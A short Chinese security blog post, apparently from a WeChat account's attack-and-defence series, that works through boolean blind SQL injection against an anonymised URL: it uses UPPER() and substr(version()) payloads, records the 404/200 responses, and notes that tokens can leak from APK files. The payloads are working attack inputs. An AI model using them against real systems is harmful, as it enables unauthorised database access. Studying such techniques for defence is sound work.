1
在一次测试中,发现存在SQL盲注的 URI 为:
http://xxx.xxx.xxx.xxx/item/default %INJECTIONPOINTHERE%
首先访问
http://xxx.xxx.xxx.xxx/item/default'and%20UPPER('asd')='asd'--
页面返回 404
继续访问
http://xxx.xxx.xxx.xxx/item/default'and%20UPPER('asd')='ASD'--
页面返回 200
继续盲注
http://xxx.xxx.xxx.xxx/item/default'and%20substr(version(),1,1)='2'-- ==> will give you 200 OK
http://xxx.xxx.xxx.xxx/item/default'and%20substr(version(),2,1)='0'-- ==> will give you 200 OK
如果在用户可控制的输入中没有进行充分的过滤,则生成的SQL查询可能导致用户输入被解释为SQL而不是普通用户数据。这可用于更改查询逻辑以绕过安全检查,或用于插入修改后端数据库的其他语句,甚至有可能执行系统命令。
2
在一些apk文件中,有可能获取到内部令牌,从而有可能进一步获取敏感信息。
星光不问赶路人,岁月不负有心人!
加油,网安人!
“攻防技术交流”这一个系列的文章
主要记录日常实战与学习交流的
攻防思路与心得体会
如果你有新奇的攻防idea
非常欢迎与小伙伴们一起分享交流
VX群暗号:
后台回复“ 技术交流 ”获取
入群须知:
纯技术交流群禁止灌水
长期潜水不分享交流的会进行清理
希望大家予以理解
本文始发于微信公众号(西子实验室):安全娱乐圈之攻防技术交流系列文章 第6弹
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论